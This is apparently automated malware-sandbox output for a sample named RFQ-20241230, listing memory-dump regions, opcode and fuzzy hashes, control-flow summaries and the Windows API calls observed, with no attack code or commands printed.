                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2ec53d6a04b0df61c3e6f2e9b44c1799bcc36ac7ce22e2d03cb811a00901fec1
                            • Instruction ID: 48f827de113c7c541e7aa5f49d345044a808f723442c9e7753ecf00e38751b55
                            • Opcode Fuzzy Hash: 2ec53d6a04b0df61c3e6f2e9b44c1799bcc36ac7ce22e2d03cb811a00901fec1
                            • Instruction Fuzzy Hash: 9D72C130B046158FDB05EB78C854B6EB7A7FF89210F2885A9D416DB3A4DF34EC4687A1

                            Control-flow Graph

                            Function at 5bd61c4 in the memory dump at 05BD0000 (graph node and edge data omitted).
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3d38d97cf3d7e78a45712290b7f34688b1b18aeb98428a389f58a699fbcaa7c4
                            • Instruction ID: a9c797b977a7fb3b8c2ca483bd259ec23589234ab1b3bcfcb3bbaba28a4ea4a2
                            • Opcode Fuzzy Hash: 3d38d97cf3d7e78a45712290b7f34688b1b18aeb98428a389f58a699fbcaa7c4
                            • Instruction Fuzzy Hash: 0E425D31A00209DFDB14DB68D854BADBBB2FF89310F2581A5E445EB3A1DB35AD45CBA0

                            Control-flow Graph

                            Function at 76218bc in the memory dump at 07620000; its nodes call into 7622c78 and 7622c69, which wrap CreateIconFromResourceEx (graph node and edge data omitted).
                            Memory Dump Source
                            • Source File: 00000000.00000002.1365368010.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7620000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3a5c07a1dca1f1947190b6e1d4a9c15a8034cad10a2dad2b0b339e9bfdadf53b
                            • Instruction ID: 33b7e56596db7b5fa9fc254f084b29cad4a070f44cf8da590fcb343bdd7b539d
                            • Opcode Fuzzy Hash: 3a5c07a1dca1f1947190b6e1d4a9c15a8034cad10a2dad2b0b339e9bfdadf53b
                            • Instruction Fuzzy Hash: DB326E71A00629CFDB54DFB8C4507AEBBF2BF89300F15856AD40AAB384DA349C86DF55
                            Memory Dump Source
                            • Source File: 00000000.00000002.1365368010.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7620000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a189ecffc0304f54d10c3c836ce68aadac03230d249fa5c1e5694941bc9d35ed
                            • Instruction ID: d2ce9a960f94b0e3a188fa974cf2921ce8b1946341684337ea0f0bc2b38a23ac
                            • Opcode Fuzzy Hash: a189ecffc0304f54d10c3c836ce68aadac03230d249fa5c1e5694941bc9d35ed
                            • Instruction Fuzzy Hash: EBC18CB1E00629CFCB64CF65C89079DBBF2BF89300F15C1A9D40AAB255EB349986DF51
                            Memory Dump Source
                            • Source File: 00000000.00000002.1358406786.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e112bdc5f3018995ceeec1be54ab81bd70e57df8c55d2901eaa16e1a4de7ac1e
                            • Instruction ID: c780ae31bbef4509046f3e0b4d7d7c4a904c53c354fd446113cece06b9375e5c
                            • Opcode Fuzzy Hash: e112bdc5f3018995ceeec1be54ab81bd70e57df8c55d2901eaa16e1a4de7ac1e
                            • Instruction Fuzzy Hash: 23817E74E00219DFDB55DFA9D884AAEBBF2FF88300F20812AE419AB355DB345945CF51
                            Memory Dump Source
                            • Source File: 00000000.00000002.1358406786.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3968025cc1e62d769b15ce21d639752b9c0aeb922bd4624de78c1179c42991a3
                            • Instruction ID: fda44e3487dfbbd44ab9d98fa9927139b4d9e935beb2c627ee5c1fb21f29e5aa
                            • Opcode Fuzzy Hash: 3968025cc1e62d769b15ce21d639752b9c0aeb922bd4624de78c1179c42991a3
                            • Instruction Fuzzy Hash: 3F816E74E00219DFDB54DFA9D884AAEBBF2FF88300F208129E419AB355DB385945CF51

                            Control-flow Graph

                            APIs
                            • GetCurrentProcess.KERNEL32 ref: 0137E0FE
                            • GetCurrentThread.KERNEL32 ref: 0137E13B
                            • GetCurrentProcess.KERNEL32 ref: 0137E178
                            • GetCurrentThreadId.KERNEL32 ref: 0137E1D1
                            Memory Dump Source
                            • Source File: 00000000.00000002.1358406786.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_RFQ-20241230.jbxd
                            Similarity
                            • API ID: Current$ProcessThread
                            • String ID:
                            • API String ID: 2063062207-0
                            • Opcode ID: e8ff27c9b065cec6983ff0319003b72ac7b92f1ade1399119aa9dba260b9a213
                            • Instruction ID: f31d804d11d02d62fcf17c748d64844d8c9bd7ffc516e8bf26d8a65db08a7f7a
                            • Opcode Fuzzy Hash: e8ff27c9b065cec6983ff0319003b72ac7b92f1ade1399119aa9dba260b9a213
                            • Instruction Fuzzy Hash: 7E5156B09007098FEB18CFAAD548BDEBBF1FF88314F208469E419AB3A0D7745944CB65

                            Control-flow Graph

                            Function at 137590c in the memory dump at 01370000, calling CreateActCtxA (graph node and edge data omitted).
                            APIs
                            • CreateActCtxA.KERNEL32(?), ref: 013759C9
                            Memory Dump Source
                            • Source File: 00000000.00000002.1358406786.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_RFQ-20241230.jbxd
                            Similarity
                            • API ID: Create
                            • String ID:
                            • API String ID: 2289755597-0
                            • Opcode ID: 09a822697bd00beb6a307339ad3dd607166b9c83cdbf21e645c19f085079a7a1
                            • Instruction ID: 295a5c751697071e2231b2c774d6a8569cfca454a927d037286797d8f530d436
                            • Opcode Fuzzy Hash: 09a822697bd00beb6a307339ad3dd607166b9c83cdbf21e645c19f085079a7a1
                            • Instruction Fuzzy Hash: 3C41B070C00719DFEB25DFA9C884BDEBBB5BF89704F20846AD408AB251DB756945CF50

                            Control-flow Graph

                            Function at 137449c in the memory dump at 01370000, calling CreateActCtxA (graph node and edge data omitted).
                            APIs
                            • CreateActCtxA.KERNEL32(?), ref: 013759C9
                            Memory Dump Source
                            • Source File: 00000000.00000002.1358406786.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_RFQ-20241230.jbxd
                            Similarity
                            • API ID: Create
                            • String ID:
                            • API String ID: 2289755597-0
                            • Opcode ID: eb5205e6aff2fcfe8b6ad6bb7f182856673e54fef1da1d4a7ced0af5efdbfcf1
                            • Instruction ID: cb44e272526cfa92b94743c75d0179e8bbc158bc70798acdc0d179fae2bde092
                            • Opcode Fuzzy Hash: eb5205e6aff2fcfe8b6ad6bb7f182856673e54fef1da1d4a7ced0af5efdbfcf1
                            • Instruction Fuzzy Hash: 85419FB0C00759CBEB25DFAAC884B9EBBB5BF49704F20846AD408AB251DB756945CF90

                            Control-flow Graph (legend: Executed / Not Executed)
                            control_flow_graph 54 7622c78-7622c8a 55 7622c92-7622c9d 54->55 56 7622c8d call 76218f8 54->56 57 7622cb2-7622d44 CreateIconFromResourceEx 55->57 58 7622c9f-7622caf 55->58 56->55 62 7622d46-7622d4c 57->62 63 7622d4d-7622d6a 57->63 62->63
                            Memory Dump Source
                            • Source File: 00000000.00000002.1365368010.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7620000_RFQ-20241230.jbxd
                            Similarity
                            • API ID: CreateFromIconResource
                            • String ID:
                            • API String ID: 3668623891-0
                            • Opcode ID: 917848f60ebe7233937050216e6973e36337feb5456bb50dd101d76fa54e3d3e
                            • Instruction ID: 13fc2f842880c46361a6a31407c91538c63bc40170eaada0379cc4f5d3aa94f5
                            • Opcode Fuzzy Hash: 917848f60ebe7233937050216e6973e36337feb5456bb50dd101d76fa54e3d3e
                            • Instruction Fuzzy Hash: 993186B29003599FCB11CFA9D840ADABFF4FF09210F14846AE954A7221C3399856DFA1

                            Control-flow Graph (legend: Executed / Not Executed)
                            control_flow_graph 66 137e2c8-137e35c DuplicateHandle 67 137e365-137e382 66->67 68 137e35e-137e364 66->68 68->67
                            APIs
                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0137E34F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1358406786.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_RFQ-20241230.jbxd
                            Similarity
                            • API ID: DuplicateHandle
                            • String ID:
                            • API String ID: 3793708945-0
                            • Opcode ID: b4ad9fc7b514c2f8bb80b5b44d874e96d7e30355ad3a126bf3dce76a87d49805
                            • Instruction ID: 78b2cd0d9c6a4b148c16afe6a32e57bd2fd7a2de811ea3e1cceac15e1cabf56e
                            • Opcode Fuzzy Hash: b4ad9fc7b514c2f8bb80b5b44d874e96d7e30355ad3a126bf3dce76a87d49805
                            • Instruction Fuzzy Hash: D721D5B5900249AFDB10CFAAD584ADEFBF4FB48314F14846AE918A3350D378A954CF65

                            Control-flow Graph (legend: Executed / Not Executed)
                            control_flow_graph 71 76218f8-7622d44 CreateIconFromResourceEx 73 7622d46-7622d4c 71->73 74 7622d4d-7622d6a 71->74 73->74
                            APIs
                            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,07622C92,?,?,?,?,?), ref: 07622D37
                            Memory Dump Source
                            • Source File: 00000000.00000002.1365368010.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7620000_RFQ-20241230.jbxd
                            Similarity
                            • API ID: CreateFromIconResource
                            • String ID:
                            • API String ID: 3668623891-0
                            • Opcode ID: 9261234116cacb39c00c773b62ed654b13d5dec90d2d6bc088f3df5ac5cb393f
                            • Instruction ID: de90ba73fc9aa44314cc6e8da5d6e3e0bb3c58ea46cdbdd74aedc3deb50ed391
                            • Opcode Fuzzy Hash: 9261234116cacb39c00c773b62ed654b13d5dec90d2d6bc088f3df5ac5cb393f
                            • Instruction Fuzzy Hash: 051126B6800259DFDB10CFAAD844BDEBFF8FB48310F54841AE915A7250C379A951DFA4

                            Control-flow Graph (legend: Executed / Not Executed)
                            control_flow_graph 77 137bfe0-137c020 78 137c022-137c025 77->78 79 137c028-137c053 GetModuleHandleW 77->79 78->79 80 137c055-137c05b 79->80 81 137c05c-137c070 79->81 80->81
                            APIs
                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0137C046
                            Memory Dump Source
                            • Source File: 00000000.00000002.1358406786.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1370000_RFQ-20241230.jbxd
                            Similarity
                            • API ID: HandleModule
                            • String ID:
                            • API String ID: 4139908857-0
                            • Opcode ID: 85179db7fa2c19f54e28bf79bd6391cda47086f6c11284b4db8cbeae12e6e3fe
                            • Instruction ID: 712621b73b709353627e88f15d9836b97f648d1feb55fbedee83589616165f1d
                            • Opcode Fuzzy Hash: 85179db7fa2c19f54e28bf79bd6391cda47086f6c11284b4db8cbeae12e6e3fe
                            • Instruction Fuzzy Hash: 681110B6C002498FDB20CF9AD444BDEFBF4AF89214F10842AD928B7610C379A545CFA1

                            Control-flow Graph (legend: Executed / Not Executed)
                            control_flow_graph 83 95f2598-95f98ea PostMessageW 85 95f98ec-95f98f2 83->85 86 95f98f3-95f9907 83->86 85->86
                            APIs
                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 095F98DD
                            Memory Dump Source
                            • Source File: 00000000.00000002.1367126756.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09530000, based on PE: true
                            • Associated: 00000000.00000002.1366672839.0000000009530000.00000004.08000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_9530000_RFQ-20241230.jbxd
                            Similarity
                            • API ID: MessagePost
                            • String ID:
                            • API String ID: 410705778-0
                            • Opcode ID: 274a828fa7224fe6cd5c7f3eb399f57cbcf378dddbc034da17b1370fd9a270df
                            • Instruction ID: 09ffb37181874f0d9d481e62172e166807dc8f0943c619d0d3e6138d154152b1
                            • Opcode Fuzzy Hash: 274a828fa7224fe6cd5c7f3eb399f57cbcf378dddbc034da17b1370fd9a270df
                            • Instruction Fuzzy Hash: 741100B58007499FDB10DF9AD885BDEFBF8FB48324F10841AEA58A7240D375A944CFA5

                            Control-flow Graph (legend: Executed / Not Executed)
                            control_flow_graph 167 5bdae49-5bdae84 169 5bdae9c-5bdaea5 167->169 170 5bdae86-5bdae8c 167->170 173 5bdaea7-5bdaeb4 169->173 174 5bdaec3-5bdaedb 169->174 171 5bdae8e 170->171 172 5bdae90-5bdae92 170->172 171->169 172->169 173->174 177 5bdaeb6-5bdaec0 call 5bdac38 173->177 192 5bdaedd call 5bdaf61 174->192 193 5bdaedd call 5bdaf70 174->193 177->174 178 5bdaee3-5bdaee6 180 5bdaf1e-5bdaf4b 178->180 181 5bdaee8-5bdaef6 call 5bdac38 178->181 194 5bdaf4d call 5bdbbe8 180->194 195 5bdaf4d call 5bdbbd7 180->195 181->180 186 5bdaef8-5bdaf1c 181->186 186->180 189 5bdaf53-5bdaf5a 192->178 193->178 194->189 195->189
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID: W
                            • API String ID: 0-655174618
                            • Opcode ID: debfdb7bcda3cf70fb25afbb27260489357413a657e1f962a38ac8de292e930c
                            • Instruction ID: a684c031fd5d45f5e26dbbdf91be6d218ba8af180a91baa6a2ad207daaf65c12
                            • Opcode Fuzzy Hash: debfdb7bcda3cf70fb25afbb27260489357413a657e1f962a38ac8de292e930c
                            • Instruction Fuzzy Hash: FD315A757002159FCB15DF68C884AADBBB2FF89320F244696E525DB2B1D770ED05CBA0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a121d60c93e6509c85f8733212046649b2e08c85eeb4c3569fe46f9089386462
                            • Instruction ID: 6d253b45c84567b71b01460ba19551f724db1c20379c17cf1cbeb052dfc4f9dd
                            • Opcode Fuzzy Hash: a121d60c93e6509c85f8733212046649b2e08c85eeb4c3569fe46f9089386462
                            • Instruction Fuzzy Hash: 1C22AD35B082058FDB14DB64C854BB9B7F2FF89220F2485AAD407DB2A1EB35EC45CB61
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 00ffaa6756b4b32dd22b1a5280eee1f50f55996c7f52d476326982b84631569d
                            • Instruction ID: 5372fe7a3f3aebfa47357cf1a2673e25e9bb383df974ce64012bceaf210edd9d
                            • Opcode Fuzzy Hash: 00ffaa6756b4b32dd22b1a5280eee1f50f55996c7f52d476326982b84631569d
                            • Instruction Fuzzy Hash: 8A02F434600605DFDB48DF68D498AADBBF2FF89211F5581A8E40ADB362DB35EC85CB50
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0075897e197fd0fefe644fc6577a39dcdde498434b1ec2af2ca526be0a91891a
                            • Instruction ID: 0da0492a9f636efb2dd6bb0694ad268c6ce9dc7020863939d5e72dde9630b7f3
                            • Opcode Fuzzy Hash: 0075897e197fd0fefe644fc6577a39dcdde498434b1ec2af2ca526be0a91891a
                            • Instruction Fuzzy Hash: E2D17F307017058FC728DF75C484AAEB7F6BF85320B5549A9E4529B3A1EB35E846CF20
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 813caca518fe74c431e5a6781fb8a5d83816b1efd9a37dd56128acd6d8ae6306
                            • Instruction ID: 7af15bc7a7ba99598ca577d39da32924894f01097caccb5f370ae00752dee9ab
                            • Opcode Fuzzy Hash: 813caca518fe74c431e5a6781fb8a5d83816b1efd9a37dd56128acd6d8ae6306
                            • Instruction Fuzzy Hash: 56C1F334B00205CFCB58DF68D598AADBBF2BF89711F1545A8E406AB3A1DB35EC41CB60
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9b17a3030432fda8f16a375b3f66cb15cbccc2c8684c76ce0fa5329257e7bcde
                            • Instruction ID: 2a0ae842becf0b98db9c8b7114b0f9b55d99ca0dbef5276797861f2f66b8161f
                            • Opcode Fuzzy Hash: 9b17a3030432fda8f16a375b3f66cb15cbccc2c8684c76ce0fa5329257e7bcde
                            • Instruction Fuzzy Hash: 8871A2347007058FDB25DB64C884BBAF7A6FF84304F1584AED54A9B2A1DB79A885CF60
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 68d02cab212dcc2b7f047638c68aae143aae2e9b277d070ed900c6b67534993a
                            • Instruction ID: 8a107aad7d5d0400bbae88d6282f5048e7e089ace9a9e6e88d658f2fbca471ff
                            • Opcode Fuzzy Hash: 68d02cab212dcc2b7f047638c68aae143aae2e9b277d070ed900c6b67534993a
                            • Instruction Fuzzy Hash: B98123347046058FDB14DF68C894BA9F7B2FF84300F1595A9D846AB366EB34ED45CB60
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ba5782a5f9e7abf59e02f84004959d6b647aa5f34571d4953f63a086fe31641e
                            • Instruction ID: bbd47c67bcee48a4358b9cd70380cd5af2a3c1467bf70e88daeb76f9bf81b810
                            • Opcode Fuzzy Hash: ba5782a5f9e7abf59e02f84004959d6b647aa5f34571d4953f63a086fe31641e
                            • Instruction Fuzzy Hash: 8551E230B042059FDB18EBB8D0547AEB7B6EF85211B2485ADD00ADB391DB35ED42CBA1
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ed110a5f4103fde8591d96df28869b406b8ca0f9bcb0bce75e01269bc3ff1c53
                            • Instruction ID: 229ce3a7c9485982d0b33a482d0b877a34fce353c6e587ce7215107a30a1ed18
                            • Opcode Fuzzy Hash: ed110a5f4103fde8591d96df28869b406b8ca0f9bcb0bce75e01269bc3ff1c53
                            • Instruction Fuzzy Hash: 3E6160307007058FDB249B68C848BEAF7E6FF84305F5584A9D14A9B291EF79A885CF60
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1f795e7fbab8b27680837d3ca54e243c3a9773a779733402662abce1ffe4f9f3
                            • Instruction ID: c90a430f422fc90192ef914229ba76b26a7b2d0f175d778773fa6048c3d34319
                            • Opcode Fuzzy Hash: 1f795e7fbab8b27680837d3ca54e243c3a9773a779733402662abce1ffe4f9f3
                            • Instruction Fuzzy Hash: 6C6174307007058FDB149B64C848BEAF7E6FF84305F5584AAD15A9B2A1EF75A885CF60
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7076691a2fa3608bdc54370d4c4373181cb5240b6929d71dee0fca10633fe893
                            • Instruction ID: c0d020b413f230a9d5c99e42fe4aed51b34f2c4e63453a5ea156420c68a8fcd5
                            • Opcode Fuzzy Hash: 7076691a2fa3608bdc54370d4c4373181cb5240b6929d71dee0fca10633fe893
                            • Instruction Fuzzy Hash: ED613735A00205CFC754DF68D588AA9B7F2FF49725F2585A8E406EB3A1EB31EC45CB60
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: df63672e6b41365a102da1563cdba3e7db89770942566e2e5fa8340c0091fa20
                            • Instruction ID: 93f1e1c2ef796b8d92beb27a937ecf26420eab7898c95ee0c729223924912797
                            • Opcode Fuzzy Hash: df63672e6b41365a102da1563cdba3e7db89770942566e2e5fa8340c0091fa20
                            • Instruction Fuzzy Hash: 835157356002058FDB18DF65C988FA9B7B2FF89714F1481A9E406DB261EB31EC45CBA0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ac41957eab1e53c214e7b255b66ce7739f44ca27725449665228b90476187dc2
                            • Instruction ID: b7c2aadc08a2c9b25a96fe78c5a69cc8318e3cbb026434e7d930e7bb6fd34709
                            • Opcode Fuzzy Hash: ac41957eab1e53c214e7b255b66ce7739f44ca27725449665228b90476187dc2
                            • Instruction Fuzzy Hash: 18516C343006059FD714DB28D484A6AB3E6FF84225F1486A9D55ACB360EF71EC46CBA1
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6f53c92801b32fb48dde58d5942358bd310407e5a732622f1325aa23b0f63388
                            • Instruction ID: 31ea12044281f70db49d3831de2ecb4bcce24e67d6f11ed81b8ba2d3fa3414c4
                            • Opcode Fuzzy Hash: 6f53c92801b32fb48dde58d5942358bd310407e5a732622f1325aa23b0f63388
                            • Instruction Fuzzy Hash: 9F4182347006119FDB659F24C888BB9F3B2FF86310F1449A9D5468B2A1EF75BC46CB61
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7b020275c2a4850545fd704edb6de7463ba8aa91bb079beeb46510662b1a5d19
                            • Instruction ID: b8b8fbc7c2bc33e616b1676e0b58b99a7f3d2fc7d9426d2deb4b9ad39289223a
                            • Opcode Fuzzy Hash: 7b020275c2a4850545fd704edb6de7463ba8aa91bb079beeb46510662b1a5d19
                            • Instruction Fuzzy Hash: 044152347006119FDB659F24C888BBAF3E6FF85310F5089A9D5468B291EF71BC46CBA1
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a1fb7c69bd49093cea67b3e0151a6d5765b51ca616586179fbc5f1318f588cf1
                            • Instruction ID: 3a6d3edfc8d7e0293ad42f252598add322311438ea3757077ea992265b933d60
                            • Opcode Fuzzy Hash: a1fb7c69bd49093cea67b3e0151a6d5765b51ca616586179fbc5f1318f588cf1
                            • Instruction Fuzzy Hash: 9F31F8343146018FDB54DB29C8A4F6AB3A6FF88755F1585A9E41ACB361EE34E841CB60
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5605ebef0cf67311655bd44492bbec534df7add820a329ab578c42aa7c6eb1ba
                            • Instruction ID: 6fe7209b90362d3c3534addc4b2128018ed3923c037022d4ecc5c091cf93b9d3
                            • Opcode Fuzzy Hash: 5605ebef0cf67311655bd44492bbec534df7add820a329ab578c42aa7c6eb1ba
                            • Instruction Fuzzy Hash: 373139343046008FD714DB28C854F6AB7A6FF89659F1581E9E45ACB371EA34EC42CB60
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 62745ef220434148edbbc85bbbc319c3480cb52b5b5692d0fab52022e1ec9f35
                            • Instruction ID: de2025be46d5b496663154b170e4c6b4b64992f78b83d27c9fbbc3de6dd6d734
                            • Opcode Fuzzy Hash: 62745ef220434148edbbc85bbbc319c3480cb52b5b5692d0fab52022e1ec9f35
                            • Instruction Fuzzy Hash: B03119757002159FCB14DF68C884E6DBBB6FF89220F2446A9E525DB2B1DB71ED01CBA0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f18419e4bf9569cfd422754f2ac6f7f0d88cad654707af87dad98467f1602479
                            • Instruction ID: b3f909cde34ecb4046ff0cc2880c0dcf2173e84565f248ed60036b49618b70cd
                            • Opcode Fuzzy Hash: f18419e4bf9569cfd422754f2ac6f7f0d88cad654707af87dad98467f1602479
                            • Instruction Fuzzy Hash: A9411675A0021ACFDB04DFA8D884BEDB7B1FF48310F1585A5D559AB3A1DB38A941CFA0
                            Memory Dump Source
